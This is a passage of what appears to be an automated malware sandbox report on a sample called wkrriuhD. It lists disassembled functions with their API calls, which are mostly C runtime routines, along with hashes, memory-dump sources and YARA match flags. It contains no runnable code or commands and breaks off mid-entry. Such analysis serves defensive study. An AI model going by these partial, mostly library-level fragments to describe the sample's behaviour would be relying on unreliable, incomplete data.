                                                                                                                                                                                          • Snapshot File: hcaresult_24_2_400000_wkrriuhD.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID:
                                                                                                                                                                                          • String ID: !"what?"$!"what?"$(ctorMask & 0x0080) == 0$(ctorMask & 0x0100) != 0 || (ctorMask & 0x0020) == 0$XX.CPP$XX.CPP$XX.CPP$XX.CPP$what?$what?
                                                                                                                                                                                          • API String ID: 0-2639688565
                                                                                                                                                                                          • Opcode ID: fd697a23a8341155eeb8432b0f92f72cb662826ad4f5abca942cfff930da084f
                                                                                                                                                                                          • Instruction ID: f60a34a71469ba83e7833d9ec68331f2d83224e98db52aa81e8652658bfbd3b2
                                                                                                                                                                                          • Opcode Fuzzy Hash: fd697a23a8341155eeb8432b0f92f72cb662826ad4f5abca942cfff930da084f
                                                                                                                                                                                          • Instruction Fuzzy Hash: BE21B431744345A7EA242E658F4EF6F2564AF95B01F680533FD01722C0E6FD4A15D16F
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 00403B50 Relevance: 12.6, Strings: 10, Instructions: 99COMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000018.00000002.3644066664.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          • Associated: 00000018.00000002.3643966660.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000018.00000002.3644145580.000000000040D000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000018.00000002.3644413969.0000000000416000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_24_2_400000_wkrriuhD.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID:
                                                                                                                                                                                          • String ID: XX.CPP$XX.CPP$XX.CPP$XX.CPP$XX.CPP$dtrCount <= vdtCount$etdCount <= elemCount || elemCount == 0$varType->tpArr.tpaElemType->tpClass.tpcFlags & CF_HAS_DTOR$varType->tpMask & TM_IS_ARRAY$vdtCount
                                                                                                                                                                                          • API String ID: 0-399877090
                                                                                                                                                                                          • Opcode ID: fe4e1fff7598651d3aff739946f9fed268690cd354c9be1bb4bbca50bd1de878
                                                                                                                                                                                          • Instruction ID: 88776ef7a22d3ae589bf471a2eb8d12af5e4a32f205574c383fb24602ad5b1ef
                                                                                                                                                                                          • Opcode Fuzzy Hash: fe4e1fff7598651d3aff739946f9fed268690cd354c9be1bb4bbca50bd1de878
                                                                                                                                                                                          • Instruction Fuzzy Hash: 52313532A00308ABEF00DF55CC8AF9E7B74AF54714F14457BFD043A2C2D3B9AA608699
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 005CB8BE Relevance: 12.5, APIs: 6, Strings: 1, Instructions: 284COMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          APIs
                                                                                                                                                                                          • __allrem.LIBCMT ref: 005CBA4B
                                                                                                                                                                                          • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 005CBA67
                                                                                                                                                                                          • __allrem.LIBCMT ref: 005CBA7E
                                                                                                                                                                                          • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 005CBA9C
                                                                                                                                                                                          • __allrem.LIBCMT ref: 005CBAB3
                                                                                                                                                                                          • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 005CBAD1
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000018.00000002.3646905411.0000000000590000.00000040.00000400.00020000.00000000.sdmp, Offset: 00590000, based on PE: true
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_24_2_590000_wkrriuhD.jbxd
                                                                                                                                                                                          Yara matches
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: Unothrow_t@std@@@__allrem__ehfuncinfo$??2@
                                                                                                                                                                                          • String ID: "+Y
                                                                                                                                                                                          • API String ID: 1992179935-2689556389
                                                                                                                                                                                          • Opcode ID: 372230fba1730b24943150f2d9223dcab7b4bce73996abcbaedb59f98a560456
                                                                                                                                                                                          • Instruction ID: 0a0f7aa9fb5d4dec07a4055d33c61d7b494f65cbfcbcf32f0bf62866a2a3ffcb
                                                                                                                                                                                          • Opcode Fuzzy Hash: 372230fba1730b24943150f2d9223dcab7b4bce73996abcbaedb59f98a560456
                                                                                                                                                                                          • Instruction Fuzzy Hash: 6181F572A007069FF7249EADDC87F6A7BA8BF80720F24462EF591D6681EB70DD008751
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 005D5F5B Relevance: 12.5, APIs: 6, Strings: 1, Instructions: 266COMMONLIBRARYCODE
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          APIs
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000018.00000002.3646905411.0000000000590000.00000040.00000400.00020000.00000000.sdmp, Offset: 00590000, based on PE: true
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_24_2_590000_wkrriuhD.jbxd
                                                                                                                                                                                          Yara matches
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: _free$_abort_memcmp
                                                                                                                                                                                          • String ID: C
                                                                                                                                                                                          • API String ID: 137591632-1037565863
                                                                                                                                                                                          • Opcode ID: 0768c3d9e3dd940518f99a63cbcd3aeb961d046fc1a72f364ae26972a0ea9dca
                                                                                                                                                                                          • Instruction ID: 9b63afcefe52b7c6e09b9388c9fccae217bf7b90bead462e0a215c855eca1371
                                                                                                                                                                                          • Opcode Fuzzy Hash: 0768c3d9e3dd940518f99a63cbcd3aeb961d046fc1a72f364ae26972a0ea9dca
                                                                                                                                                                                          • Instruction Fuzzy Hash: EDB11775A0161ADBDB34DF18C888AADBBB4FF58304F1045ABE949A7351E731AE91CF40
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 12375179 Relevance: 12.5, APIs: 6, Strings: 1, Instructions: 266COMMONLIBRARYCODE
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          APIs
                                                                                                                                                                                            • Part of subcall function 12378215: GetLastError.KERNEL32(00000020,?,1236A7F5,?,?,?,1236F9A8,?,?,00000020,00000000,?,?,?,1235DD01,0000003B), ref: 12378219
                                                                                                                                                                                            • Part of subcall function 12378215: _free.LIBCMT ref: 1237824C
                                                                                                                                                                                            • Part of subcall function 12378215: SetLastError.KERNEL32(00000000,1236F9A8,?,?,00000020,00000000,?,?,?,1235DD01,0000003B,?,00000041,00000000,00000000), ref: 1237828D
                                                                                                                                                                                            • Part of subcall function 12378215: _abort.LIBCMT ref: 12378293
                                                                                                                                                                                          • _memcmp.LIBVCRUNTIME ref: 12375423
                                                                                                                                                                                          • _free.LIBCMT ref: 12375494
                                                                                                                                                                                          • _free.LIBCMT ref: 123754AD
                                                                                                                                                                                          • _free.LIBCMT ref: 123754DF
                                                                                                                                                                                          • _free.LIBCMT ref: 123754E8
                                                                                                                                                                                          • _free.LIBCMT ref: 123754F4
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000018.00000002.3664441036.0000000012330000.00000040.00001000.00020000.00000000.sdmp, Offset: 12330000, based on PE: true
                                                                                                                                                                                          • Associated: 00000018.00000002.3664441036.00000000123A4000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000018.00000002.3664441036.00000000123A8000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_24_2_12330000_wkrriuhD.jbxd
                                                                                                                                                                                          Yara matches
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: _free$ErrorLast$_abort_memcmp
                                                                                                                                                                                          • String ID: C
                                                                                                                                                                                          • API String ID: 1679612858-1037565863
                                                                                                                                                                                          • Opcode ID: b8d4cb05f274ddc4f0e0af1d66be1e6ec7ecb9a625997558cd0ce1604b71a21a
                                                                                                                                                                                          • Instruction ID: f2eb1e9af7e1d8446882ba466fed14e285c4bbcf9845f830196d32b3076bf74f
                                                                                                                                                                                          • Opcode Fuzzy Hash: b8d4cb05f274ddc4f0e0af1d66be1e6ec7ecb9a625997558cd0ce1604b71a21a
                                                                                                                                                                                          • Instruction Fuzzy Hash: ECB12B76A0125A9FDB68CF18D884B9DB7B4FB48315F5046AAD849A7390D734AE90CF40
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 0059DBDB Relevance: 12.5, APIs: 3, Strings: 4, Instructions: 204COMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          APIs
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000018.00000002.3646905411.0000000000590000.00000040.00000400.00020000.00000000.sdmp, Offset: 00590000, based on PE: true
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_24_2_590000_wkrriuhD.jbxd
                                                                                                                                                                                          Yara matches
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: _wcslen
                                                                                                                                                                                          • String ID: 6$8+G$8+G$hdF
                                                                                                                                                                                          • API String ID: 176396367-3129652869
                                                                                                                                                                                          • Opcode ID: 1a9c3962d4051c0992c0d3c4f02e65f90ab46b8a23f48d03cfd53388f795b238
                                                                                                                                                                                          • Instruction ID: b71f7663356fb884b06fe0b566758d46698ad801881381fa1b07abe6dae33a95
                                                                                                                                                                                          • Opcode Fuzzy Hash: 1a9c3962d4051c0992c0d3c4f02e65f90ab46b8a23f48d03cfd53388f795b238
                                                                                                                                                                                          • Instruction Fuzzy Hash: B151D3602583027BDF18BB749C5AA7F7F5DBFC5740F50482DF50A8A2D3DE589C05826A
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 005CB61C Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 116COMMONLIBRARYCODE
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          APIs
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000018.00000002.3646905411.0000000000590000.00000040.00000400.00020000.00000000.sdmp, Offset: 00590000, based on PE: true
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_24_2_590000_wkrriuhD.jbxd
                                                                                                                                                                                          Yara matches
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: __dosmaperr$_free
                                                                                                                                                                                          • String ID: 7+Y$7+Y
                                                                                                                                                                                          • API String ID: 242264518-3262366632
                                                                                                                                                                                          • Opcode ID: 349d6e8f71b3306115ff94c1c71847e27514464045ba0744507fb65a98dea562
                                                                                                                                                                                          • Instruction ID: 89d7eb6f882288c412db53f1662fae1904c61ba094d83b562a7855655f9e5cb3
                                                                                                                                                                                          • Opcode Fuzzy Hash: 349d6e8f71b3306115ff94c1c71847e27514464045ba0744507fb65a98dea562
                                                                                                                                                                                          • Instruction Fuzzy Hash: 3931527140420AFFAF119FE4DC4AEAE3F68FF84365F14055AB91056261DB31CD50DB61
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 0040276A Relevance: 12.4, APIs: 2, Strings: 5, Instructions: 104COMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          APIs
                                                                                                                                                                                          • @__lockDebuggerData$qv.WKRRIUHD ref: 004027A1
                                                                                                                                                                                          • @__unlockDebuggerData$qv.WKRRIUHD ref: 0040283A
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000018.00000002.3644066664.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          • Associated: 00000018.00000002.3643966660.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000018.00000002.3644145580.000000000040D000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000018.00000002.3644413969.0000000000416000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_24_2_400000_wkrriuhD.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: Data$qvDebugger$@__lock@__unlock
                                                                                                                                                                                          • String ID: !"what?"$(dtorMask & 0x0080) == 0$XX.CPP$XX.CPP$what?
                                                                                                                                                                                          • API String ID: 2914929783-621719939
                                                                                                                                                                                          • Opcode ID: 865139f3765ff48def8f5fd269b067827c3e68def8ea50f292f22f230bfb78c8
                                                                                                                                                                                          • Instruction ID: b45044af56e270cf8ed87f5c96a059d71ef36e35bb8c0356fb506efd44f4e8ed
                                                                                                                                                                                          • Opcode Fuzzy Hash: 865139f3765ff48def8f5fd269b067827c3e68def8ea50f292f22f230bfb78c8
                                                                                                                                                                                          • Instruction Fuzzy Hash: E8311535604244DBD714AF56D94EBAA3B64AF00308F14827BF9493B6E2C7B9CC81DA99
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 12379190 Relevance: 10.9, APIs: 7, Instructions: 370timeCOMMONLIBRARYCODE
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          APIs
                                                                                                                                                                                          • _free.LIBCMT ref: 12379212
                                                                                                                                                                                          • _free.LIBCMT ref: 12379236
                                                                                                                                                                                          • _free.LIBCMT ref: 123793BD
                                                                                                                                                                                          • GetTimeZoneInformation.KERNEL32(?,00000000,00000000,00000000,?,1238F234), ref: 123793CF
                                                                                                                                                                                          • WideCharToMultiByte.KERNEL32(00000000,00000000,123A2764,000000FF,00000000,0000003F,00000000,?,?), ref: 12379447
                                                                                                                                                                                          • WideCharToMultiByte.KERNEL32(00000000,00000000,123A27B8,000000FF,?,0000003F,00000000,?), ref: 12379474
                                                                                                                                                                                          • _free.LIBCMT ref: 12379589
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000018.00000002.3664441036.0000000012330000.00000040.00001000.00020000.00000000.sdmp, Offset: 12330000, based on PE: true
                                                                                                                                                                                          • Associated: 00000018.00000002.3664441036.00000000123A4000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000018.00000002.3664441036.00000000123A8000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_24_2_12330000_wkrriuhD.jbxd
                                                                                                                                                                                          Yara matches
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: _free$ByteCharMultiWide$InformationTimeZone
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 314583886-0
                                                                                                                                                                                          • Opcode ID: 083b418cd4743830c217f3d355f17bd0aa5c550aaff6d0b899a68e11bd5262d6
                                                                                                                                                                                          • Instruction ID: 238b0b7ee6e5c4326821c3ff76192a4f101714f550fa458f5dafe42b2c6b7a46
                                                                                                                                                                                          • Opcode Fuzzy Hash: 083b418cd4743830c217f3d355f17bd0aa5c550aaff6d0b899a68e11bd5262d6
                                                                                                                                                                                          • Instruction Fuzzy Hash: 93C10577A00259AFDF10DF788884BEABBBDEF45310F1447AAD894D7281E7399A01CB50
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 005E1807 Relevance: 10.7, APIs: 7, Instructions: 204COMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          APIs
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000018.00000002.3646905411.0000000000590000.00000040.00000400.00020000.00000000.sdmp, Offset: 00590000, based on PE: true
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_24_2_590000_wkrriuhD.jbxd
                                                                                                                                                                                          Yara matches
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: _free
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 269201875-0
                                                                                                                                                                                          • Opcode ID: 3d3472b72281963140e8887de038e5b99b85b4a8b881428f5fb0b5852324da1c
                                                                                                                                                                                          • Instruction ID: db65b09532d72b336b0967c496e0075548ddd3567a16148ad91bafc8c5a64272
                                                                                                                                                                                          • Opcode Fuzzy Hash: 3d3472b72281963140e8887de038e5b99b85b4a8b881428f5fb0b5852324da1c
                                                                                                                                                                                          • Instruction Fuzzy Hash: CB61C371904645AFDB24CF6AC845BAEBFF4FF48720F14416AE988EB352E7309E418B54
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 14649492 Relevance: 10.7, APIs: 7, Instructions: 152fileCOMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          APIs
                                                                                                                                                                                          • GetConsoleCP.KERNEL32(?,00000000,?,?,?,?,?,?,?,14649C07,?,00000000,?,00000000,00000000), ref: 146494D4
                                                                                                                                                                                          • __fassign.LIBCMT ref: 1464954F
                                                                                                                                                                                          • __fassign.LIBCMT ref: 1464956A
                                                                                                                                                                                          • WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000001,?,00000005,00000000,00000000), ref: 14649590
                                                                                                                                                                                          • WriteFile.KERNEL32(?,?,00000000,14649C07,00000000,?,?,?,?,?,?,?,?,?,14649C07,?), ref: 146495AF
                                                                                                                                                                                          • WriteFile.KERNEL32(?,?,00000001,14649C07,00000000,?,?,?,?,?,?,?,?,?,14649C07,?), ref: 146495E8
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000018.00000002.3665605507.0000000014641000.00000040.00001000.00020000.00000000.sdmp, Offset: 14640000, based on PE: true
                                                                                                                                                                                          • Associated: 00000018.00000002.3665584194.0000000014640000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000018.00000002.3665605507.0000000014656000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_24_2_14640000_wkrriuhD.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: FileWrite__fassign$ByteCharConsoleMultiWide
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 1324828854-0
                                                                                                                                                                                          • Opcode ID: 9849fb73de1cadd40aa81494c75e309f9a88147f81f17ca1a4a8badde56ce1d9
                                                                                                                                                                                          • Instruction ID: ce2776d6348a44cfb328e69a18ce76dfc42dd341fe8c0a896d30eceb7567e073
                                                                                                                                                                                          • Opcode Fuzzy Hash: 9849fb73de1cadd40aa81494c75e309f9a88147f81f17ca1a4a8badde56ce1d9
                                                                                                                                                                                          • Instruction Fuzzy Hash: 8851B371E40249AFDF10CFB4D895ADEBBF8EF19304F28451AE955E7281D730A945CB60
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 1237B3BC Relevance: 10.7, APIs: 7, Instructions: 152fileCOMMONLIBRARYCODE
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          APIs
                                                                                                                                                                                          • GetConsoleCP.KERNEL32(FF8BC35D,00000000,?,?,?,?,?,?,?,1237BB31,?,00000000,FF8BC35D,00000000,00000000,FF8BC369), ref: 1237B3FE
                                                                                                                                                                                          • __fassign.LIBCMT ref: 1237B479
                                                                                                                                                                                          • __fassign.LIBCMT ref: 1237B494
                                                                                                                                                                                          • WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000001,FF8BC35D,00000005,00000000,00000000), ref: 1237B4BA
                                                                                                                                                                                          • WriteFile.KERNEL32(?,FF8BC35D,00000000,1237BB31,00000000,?,?,?,?,?,?,?,?,?,1237BB31,?), ref: 1237B4D9
                                                                                                                                                                                          • WriteFile.KERNEL32(?,?,00000001,1237BB31,00000000,?,?,?,?,?,?,?,?,?,1237BB31,?), ref: 1237B512
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000018.00000002.3664441036.0000000012330000.00000040.00001000.00020000.00000000.sdmp, Offset: 12330000, based on PE: true
                                                                                                                                                                                          • Associated: 00000018.00000002.3664441036.00000000123A4000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000018.00000002.3664441036.00000000123A8000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_24_2_12330000_wkrriuhD.jbxd
                                                                                                                                                                                          Yara matches
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: FileWrite__fassign$ByteCharConsoleMultiWide
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 1324828854-0
                                                                                                                                                                                          • Opcode ID: d283178fc17509835c7ae89a448a37a9d1ab711499eeba4d03d73c5f757fd427
                                                                                                                                                                                          • Instruction ID: 515c6bc304ef72fd92038a15449ffe5571ac1390bc6ca21118a10153e7616619
                                                                                                                                                                                          • Opcode Fuzzy Hash: d283178fc17509835c7ae89a448a37a9d1ab711499eeba4d03d73c5f757fd427
                                                                                                                                                                                          • Instruction Fuzzy Hash: 4C51B8B1E002499FDF14CFA8C885AEEBBF9EF49310F14456AEA55E7281E7349941CB60
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 14643370 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 117COMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          APIs
                                                                                                                                                                                          • _ValidateLocalCookies.LIBCMT ref: 1464339B
                                                                                                                                                                                          • ___except_validate_context_record.LIBVCRUNTIME ref: 146433A3
                                                                                                                                                                                          • _ValidateLocalCookies.LIBCMT ref: 14643431
                                                                                                                                                                                          • __IsNonwritableInCurrentImage.LIBCMT ref: 1464345C
                                                                                                                                                                                          • _ValidateLocalCookies.LIBCMT ref: 146434B1
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000018.00000002.3665605507.0000000014641000.00000040.00001000.00020000.00000000.sdmp, Offset: 14640000, based on PE: true
                                                                                                                                                                                          • Associated: 00000018.00000002.3665584194.0000000014640000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000018.00000002.3665605507.0000000014656000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_24_2_14640000_wkrriuhD.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
                                                                                                                                                                                          • String ID: csm
                                                                                                                                                                                          • API String ID: 1170836740-1018135373
                                                                                                                                                                                          • Opcode ID: edda5af013552127bde66a48f929a3902236393e46c495d0afb9ef7fc684b5fc
                                                                                                                                                                                          • Instruction ID: 4ef30b5a0da812f516a0605fa02d3ea01893116a152342b2032d3864f692c1b1
                                                                                                                                                                                          • Opcode Fuzzy Hash: edda5af013552127bde66a48f929a3902236393e46c495d0afb9ef7fc684b5fc
                                                                                                                                                                                          • Instruction Fuzzy Hash: 3041E938F003489BDF01CFA8C884ADEBBB5AF5532CF288155D915AB391D731EA91CB91
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 0040A78C Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 86fileCOMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          APIs
                                                                                                                                                                                          • GetModuleFileNameA.KERNEL32(00000000,?,00000050,Semaphore error ,?), ref: 0040A7B5
                                                                                                                                                                                          • GetStdHandle.KERNEL32(000000F4,Semaphore error ,?), ref: 0040A800
                                                                                                                                                                                          • WriteFile.KERNEL32(00000000,0040FA90,00000002,?,00000000,000000F4,Semaphore error ,?), ref: 0040A815
                                                                                                                                                                                          • WriteFile.KERNEL32(00000000,?,00000000,?,00000000,00000000,0040FA90,00000002,?,00000000,000000F4,Semaphore error ,?), ref: 0040A82A
                                                                                                                                                                                          • WriteFile.KERNEL32(00000000,0040FA93,00000002,?,00000000,00000000,?,00000000,?,00000000,00000000,0040FA90,00000002,?,00000000,000000F4), ref: 0040A83D
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000018.00000002.3644066664.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          • Associated: 00000018.00000002.3643966660.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000018.00000002.3644145580.000000000040D000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000018.00000002.3644413969.0000000000416000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_24_2_400000_wkrriuhD.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: File$Write$HandleModuleName
                                                                                                                                                                                          • String ID: Semaphore error
                                                                                                                                                                                          • API String ID: 299019120-2356287382
                                                                                                                                                                                          • Opcode ID: 8b4ebf8a01121c22523c02ab895f82b6948ef1d9d7e44797e701a40e8bc1afb1
                                                                                                                                                                                          • Instruction ID: dacfb2d6354fe0840da98f0422ce138300a64ded8d62c48eabc067c910f233f1
                                                                                                                                                                                          • Opcode Fuzzy Hash: 8b4ebf8a01121c22523c02ab895f82b6948ef1d9d7e44797e701a40e8bc1afb1
                                                                                                                                                                                          • Instruction Fuzzy Hash: BB21C872640305B9E720E2B28C46FAB322C9B05714F108537B605B61C2E6BC9E158ABF
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 1464925D Relevance: 10.6, APIs: 7, Instructions: 65COMMONLIBRARYCODE
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          APIs
                                                                                                                                                                                            • Part of subcall function 14649221: _free.LIBCMT ref: 1464924A
                                                                                                                                                                                          • _free.LIBCMT ref: 146492AB
                                                                                                                                                                                            • Part of subcall function 1464571E: HeapFree.KERNEL32(00000000,00000000,?,1464924F,?,00000000,?,00000000,?,14649276,?,00000007,?,?,14647E5A,?), ref: 14645734
                                                                                                                                                                                            • Part of subcall function 1464571E: GetLastError.KERNEL32(?,?,1464924F,?,00000000,?,00000000,?,14649276,?,00000007,?,?,14647E5A,?,?), ref: 14645746
                                                                                                                                                                                          • _free.LIBCMT ref: 146492B6
                                                                                                                                                                                          • _free.LIBCMT ref: 146492C1
                                                                                                                                                                                          • _free.LIBCMT ref: 14649315
                                                                                                                                                                                          • _free.LIBCMT ref: 14649320
                                                                                                                                                                                          • _free.LIBCMT ref: 1464932B
                                                                                                                                                                                          • _free.LIBCMT ref: 14649336
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000018.00000002.3665605507.0000000014641000.00000040.00001000.00020000.00000000.sdmp, Offset: 14640000, based on PE: true
                                                                                                                                                                                          • Associated: 00000018.00000002.3665584194.0000000014640000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000018.00000002.3665605507.0000000014656000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_24_2_14640000_wkrriuhD.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: _free$ErrorFreeHeapLast
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 776569668-0
                                                                                                                                                                                          • Opcode ID: 1a15e4038a9c55df62fbd1c49a93c652c8e4a7ee207dd1f8de08331087c78b01
                                                                                                                                                                                          • Instruction ID: 3c00c33bb0dc4e5a5f6fb5b52c13a2e331de93c76ffe5c20aaf44fee7fc2651e
                                                                                                                                                                                          • Opcode Fuzzy Hash: 1a15e4038a9c55df62fbd1c49a93c652c8e4a7ee207dd1f8de08331087c78b01
                                                                                                                                                                                          • Instruction Fuzzy Hash: 1611B1355A2B08FAEF22ABF0CC45FCB7B9D9F10308F580834A69976952DA34B4084749
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 005A1F45 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 61COMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          APIs
                                                                                                                                                                                          • std::_Lockit::_Lockit.LIBCPMT ref: 005A1F52
